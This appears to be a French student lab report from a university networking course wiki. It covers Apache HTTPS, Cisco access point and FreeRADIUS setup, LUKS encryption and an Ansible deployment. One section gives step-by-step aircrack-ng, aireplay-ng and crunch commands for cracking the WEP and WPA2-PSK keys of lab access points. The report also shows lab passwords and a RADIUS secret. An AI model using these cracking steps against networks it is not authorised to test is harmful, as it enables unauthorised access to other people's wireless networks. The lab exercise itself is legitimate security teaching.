On active le module SSL&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure le port 443 pour l'HTTPS en remplaçant dans le fichier ''/etc/apache2/ports.conf'' :&lt;br /&gt;
 Listen 80&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
par&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
         Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On place paixdieu.site.key /etc/ssl/private/ et paixdieu.site.crt /etc/ssl/certs/&lt;br /&gt;
&lt;br /&gt;
On crée les liens symboliques pour les certificats&lt;br /&gt;
&lt;br /&gt;
 &amp;gt; c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
&lt;br /&gt;
On cofigure apache en ajoutant la ligne suivante dans le fichier /etc/apache2/apache2.conf :&lt;br /&gt;
 ServerName paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On crée le fichier de configuration custom /etc/apache2/sites-available/000-paixdieu.site-ssl.conf :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerName paixdieu.site&lt;br /&gt;
         ServerAlias www.paixdieu.site&lt;br /&gt;
 	ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/html &lt;br /&gt;
 	Redirect permanent / https://paixdieu.site/&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
  &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
 	ServerAdmin webmaster@localhost&lt;br /&gt;
 	ServerName paixdieu.site&lt;br /&gt;
 	ServerAlias www.paixdieu.site&lt;br /&gt;
 	DocumentRoot /var/www/html&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/paixdieu.site.crt&lt;br /&gt;
 	SSLCertificateKeyFile /etc/ssl/private/paixdieu.site.key&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous activons le site ssl : &lt;br /&gt;
 a2ensite 000-paixdieu.site-ssl&lt;br /&gt;
&lt;br /&gt;
Nous arrivons bien à nous connecter à https://www.paixdieu.site&lt;br /&gt;
Et un test avec openssl nous renvoie le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 CONNECTED(00000003)&lt;br /&gt;
 Can't use SSL_get_servername&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify error:num=20:unable to get local issuer certificate&lt;br /&gt;
 verify return:1&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify error:num=21:unable to verify the first certificate&lt;br /&gt;
 verify return:1&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify return:1&lt;br /&gt;
 ---&lt;br /&gt;
 Certificate chain&lt;br /&gt;
 0 s:CN = paixdieu.site&lt;br /&gt;
   i:C = FR, ST = Paris, L = Paris, O = Gandi, CN = Gandi Standard SSL CA 2&lt;br /&gt;
 ---&lt;br /&gt;
 Server certificate&lt;br /&gt;
 -----BEGIN CERTIFICATE-----&lt;br /&gt;
 [...]&lt;br /&gt;
 -----END CERTIFICATE-----&lt;br /&gt;
 subject=CN = paixdieu.site&lt;br /&gt;
 issuer=C = FR, ST = Paris, L = Paris, O = Gandi, CN = Gandi Standard SSL CA 2&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
= Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
'''5.5  Intrusion sur un serveur d’application Web'''&lt;br /&gt;
[[Fichier:Wiki intrusion 5.5.zip]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom du point d'accès connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Sources : &lt;br /&gt;
- https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
- https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau006.html#sec29&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en root (mdp : Cisco si par défaut)&lt;br /&gt;
 conf t &lt;br /&gt;
 hostname wifi-ima5sc-e304 =&amp;gt; (optionnel) on donne un nom à notre point d'accès&lt;br /&gt;
 ip domain-name plil.info =&amp;gt; ajoute un nom de domaine (utilisé pour la création de certificats)&lt;br /&gt;
 &lt;br /&gt;
Activation du ssh :&lt;br /&gt;
 &lt;br /&gt;
 crypto key generate rsa general-keys modulus 2048 =&amp;gt; Génération clés publique/privée &lt;br /&gt;
 ip ssh version 2 =&amp;gt; Activation ssh&lt;br /&gt;
&lt;br /&gt;
Configuration de l'authentification sur le point d'accès :&lt;br /&gt;
&lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_marguerite group radius_marguerite&lt;br /&gt;
 radius-server host 193.48.57.177 auth-port 1812 acct-port 1813 key secret_marguerite&lt;br /&gt;
 aaa group server radius radius_marguerite&lt;br /&gt;
 server 193.48.57.177 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 dot11 ssid SSID_MARGUERITE&lt;br /&gt;
 vlan 11&lt;br /&gt;
  authentication open eap eap_marguerite&lt;br /&gt;
  authentication network-eap eap_marguerite&lt;br /&gt;
  authentication key-management wpa&lt;br /&gt;
  mbssid guest-mode&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Association du SSID à l'interface Wi-Fi :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
  encryption vlan 11 mode ciphers aes-ccm tkip&lt;br /&gt;
  ssid SSID_MARGUERITE&lt;br /&gt;
  mbssid&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration du Vlan 11 :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
 interface Dot11Radio0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  no ip route-cache&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  bridge-group 11 subscriber-loop-control&lt;br /&gt;
  bridge-group 11 spanning-disabled&lt;br /&gt;
  bridge-group 11 block-unknown-source&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration interface filaire :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet0.11&lt;br /&gt;
  encapsulation dot1Q 11&lt;br /&gt;
  bridge-group 11&lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'IP du point d'accès et sa Gateway (n'est pas à faire par tous les groupes) :&lt;br /&gt;
 &lt;br /&gt;
 conf t&lt;br /&gt;
  ip default-gateway 10.1.0.2&lt;br /&gt;
  interface BVI 1&lt;br /&gt;
   ip address 10.1.0.4 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
'''Configuration du routeur en e304 :''' &lt;br /&gt;
&lt;br /&gt;
Configuration du VLAN1 :&lt;br /&gt;
  conf t&lt;br /&gt;
  interface vlan 1&lt;br /&gt;
   ip address 10.1.0.2 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Configuration du port sur lequel est branché l'AP en mode trunk : &lt;br /&gt;
&lt;br /&gt;
  conf t&lt;br /&gt;
  interface Gi4/2&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
   switchport trunk allowed vlan add 1&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
= Serveur FreeRadius =&lt;br /&gt;
&lt;br /&gt;
Installation de freeRADIUS&lt;br /&gt;
&lt;br /&gt;
 apt install freeradius&lt;br /&gt;
&lt;br /&gt;
On commence par configurer &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; à détailler&lt;br /&gt;
&lt;br /&gt;
 client marguerite {&lt;br /&gt;
 	ipaddr = 10.1.0.4/24&lt;br /&gt;
 	secret = secret_marguerite&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
ensuite &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 eap {&lt;br /&gt;
   [...]&lt;br /&gt;
   default_eap_type = peap&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
puis &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 root Cleartext-Password := &amp;quot;glopglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug &amp;lt;code&amp;gt;freeradius -X&amp;lt;/code&amp;gt; (après avoir au préalable stoppé le processus)&lt;br /&gt;
&lt;br /&gt;
= Réalisations =&lt;br /&gt;
'''6.2 Chiffrement de données '''&lt;br /&gt;
&lt;br /&gt;
On se met en root sur une zabeth et on affiche les périphériques avec lsblk.&lt;br /&gt;
&lt;br /&gt;
On s'interesse au périphérique suivant :&lt;br /&gt;
 sdb      8:16   1   7.6G  0 disk &lt;br /&gt;
 └─sdb1   8:17   1   7.6G  0 part /media/pifou/USB DISK&lt;br /&gt;
&lt;br /&gt;
On formate la clef en ext4&lt;br /&gt;
 mkfs.ext4 /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
Puis on commence le cryptage en initialisant la clef avec un mot de passe (ici le mot de passe habituel mais x3):&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
On crée une partition chiffrée appelée data avec sa passphrase :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 data&lt;br /&gt;
&lt;br /&gt;
Que l'on formate :&lt;br /&gt;
 mkfs.ext4 /dev/mapper/data&lt;br /&gt;
&lt;br /&gt;
On monte cette partition pour lui permettre de contenir des fichiers : &lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/data_usb&lt;br /&gt;
 mount -t ext4 /dev/mapper/data /mnt/data_usb&lt;br /&gt;
&lt;br /&gt;
On écrit un fichier test dans la partition :&lt;br /&gt;
  vim /mnt/data_usb/test&lt;br /&gt;
&lt;br /&gt;
On démonte la partition :&lt;br /&gt;
 umount /mnt/data_usb&lt;br /&gt;
Et on ferme le volume maintenant chiffré :&lt;br /&gt;
 cryptsetup luksClose data&lt;br /&gt;
&lt;br /&gt;
En voulant accéder à la clef, nous avons maintenant une demande de mot de passe, une fois insérer le fichier test est bien dedans avec son contenu.&lt;br /&gt;
[[fichier:demande_mdp.png]]&lt;br /&gt;
&lt;br /&gt;
= Ferme de serveurs Web =&lt;br /&gt;
&lt;br /&gt;
Installation VM xen :&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/pra-07.cfg&lt;br /&gt;
&lt;br /&gt;
Configuration IP :&lt;br /&gt;
&lt;br /&gt;
Dans /etc/network/interfaces :&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.102&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Vérifier si on a bien la passerelle par défaut de configurer &lt;br /&gt;
&lt;br /&gt;
 ip r&lt;br /&gt;
&lt;br /&gt;
On peut pinger le routeur :&lt;br /&gt;
&lt;br /&gt;
 ping 172.26.154.254&lt;br /&gt;
&lt;br /&gt;
Mais pas les addresses ipv4 routée :&lt;br /&gt;
&lt;br /&gt;
 ping 8.8.8.8 échoue &lt;br /&gt;
&lt;br /&gt;
Redémarage service networking&lt;br /&gt;
&lt;br /&gt;
 service networking restart&lt;br /&gt;
&lt;br /&gt;
Si ça n'est pas suffisant :&lt;br /&gt;
&lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
 &lt;br /&gt;
Dans /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Redémarage service ssh&lt;br /&gt;
export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'une clé ssh sur la zabeth et ajout de cette clé dans les clés autorisées de la vm de pra :&lt;br /&gt;
&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;aviran.tetia@polytech-lille.net&amp;quot; -P &amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
On copie le contenu de la clé crée :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_ed25519.pub&lt;br /&gt;
&lt;br /&gt;
On colle son contenu dans les clé authorisées de la VM (fichier ~/.ssh/authorized_keys) :&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/authorized_keys &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Correction de la source list de la VM pour pouvoir utiliser apt correctement :&lt;br /&gt;
&lt;br /&gt;
On remplace les deux dernières lignes par :&lt;br /&gt;
&lt;br /&gt;
 deb     http://security.debian.org/debian-security bullseye-security main contrib non-free&lt;br /&gt;
 deb-src http://security.debian.org/debian-security bullseye-security  main contrib non-free&lt;br /&gt;
 &lt;br /&gt;
Installation de python sur la VM :&lt;br /&gt;
&lt;br /&gt;
 apt update &lt;br /&gt;
 apt install python3&lt;br /&gt;
&lt;br /&gt;
Création d'un venv pour l'éxecution :&lt;br /&gt;
&lt;br /&gt;
 python3 -m venv ~/env-ansible&lt;br /&gt;
 . ~/env-ansible/bin/activate&lt;br /&gt;
 pip3 install -U setuptools wheel&lt;br /&gt;
 pip3 install -U ansible&lt;br /&gt;
&lt;br /&gt;
On crée l'arborescence suivante :&lt;br /&gt;
 &lt;br /&gt;
 └── roles&lt;br /&gt;
    ├── base&lt;br /&gt;
    │   ├── tasks&lt;br /&gt;
    │   │   └── main.yml&lt;br /&gt;
    │   └── templates&lt;br /&gt;
    │       ├── hostname.j2&lt;br /&gt;
    │       └── hosts.j2&lt;br /&gt;
    └── ssh_key&lt;br /&gt;
        ├── tasks&lt;br /&gt;
        │   └── main.yml&lt;br /&gt;
        └── templates&lt;br /&gt;
            └── keys.j2&lt;br /&gt;
&lt;br /&gt;
Dans main.yml :&lt;br /&gt;
 - name: &amp;quot;Setup sshkeys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: &amp;quot;0600&amp;quot;&lt;br /&gt;
&lt;br /&gt;
/!\ ne pas mettre de tabulation dans ce fichier, uniquement des espaces&lt;br /&gt;
&lt;br /&gt;
Dans keys.j2 :&lt;br /&gt;
  {% for item in ssh_keys %}&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;{{ item.key }}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
Ajout d'une clef dans les variables de groupe group_vars/all.yaml :&lt;br /&gt;
 &lt;br /&gt;
 ssh_keys:&lt;br /&gt;
  # if you don't install this i won't be able to get into your nodes to help you debug :)&lt;br /&gt;
  - name: tmaurice@thonkpad&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad&lt;br /&gt;
    # add more keys here&lt;br /&gt;
  - name: aviran.tetia@polytech-lille.net&lt;br /&gt;
    key: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis lancer la commande :&lt;br /&gt;
&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;br /&gt;
&lt;br /&gt;
Vérification dans le fichier /root/.ssh/authorized_keys  :&lt;br /&gt;
 &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPrw78OSJACq5MFXHrhAr2bPpnTNxwLE85mzij8gKmCs thomas@thonkpad &lt;br /&gt;
 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDZfT1XxI7Zmqd07dup81hztaYKwLLapjhORHWmxUUCJ aviran.tetia@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Nous obtenons bien toutes nos clefs ssh.&lt;br /&gt;
&lt;br /&gt;
Ajout des var d'environement pour pouvoir installer docker :&lt;br /&gt;
&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Installation du rôle Docker :&lt;br /&gt;
 &lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Puis dans polytech.yml :&lt;br /&gt;
&lt;br /&gt;
 - hosts: all&lt;br /&gt;
   roles:&lt;br /&gt;
    ...&lt;br /&gt;
    - geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après ré-execution du playbook, nous pouvons vérifier que Docker est bien installé : &lt;br /&gt;
&lt;br /&gt;
 docker -v &lt;br /&gt;
&lt;br /&gt;
Installation du Pare-feu :&lt;br /&gt;
&lt;br /&gt;
source : https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5_2021/2022_G6&lt;br /&gt;
&lt;br /&gt;
- création de roles/iptables/tasks/main.yml :&lt;br /&gt;
&lt;br /&gt;
 ---&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT tcp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: tcp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_tcp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Allow ports INPUT udp&lt;br /&gt;
  iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    protocol: udp&lt;br /&gt;
    destination_port: &amp;quot;{ { item } }&amp;quot;&lt;br /&gt;
    jump: ACCEPT&lt;br /&gt;
    ctstate: NEW,ESTABLISHED&lt;br /&gt;
  loop: &amp;quot;{ { iptables_accepted_udp_ports } }&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 - name: Set the policy for the INPUT chain to DROP&lt;br /&gt;
  ansible.builtin.iptables:&lt;br /&gt;
    chain: INPUT&lt;br /&gt;
    policy: DROP&lt;br /&gt;
&lt;br /&gt;
- Cration du fichier de variables :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_tcp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8500&lt;br /&gt;
  - 8501&lt;br /&gt;
  - 8502&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 8300 &lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;br /&gt;
&lt;br /&gt;
 iptables_accepted_udp_ports:&lt;br /&gt;
  - 8600&lt;br /&gt;
  - 8301&lt;br /&gt;
  - 8302&lt;br /&gt;
  - 22&lt;br /&gt;
  - 80&lt;br /&gt;
  - 443&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Demande_mdp.png&amp;diff=58082</id>
		<title>Fichier:Demande mdp.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Demande_mdp.png&amp;diff=58082"/>
				<updated>2022-01-12T17:04:05Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58081</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=58081"/>
				<updated>2022-01-12T16:55:55Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* Réalisations */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
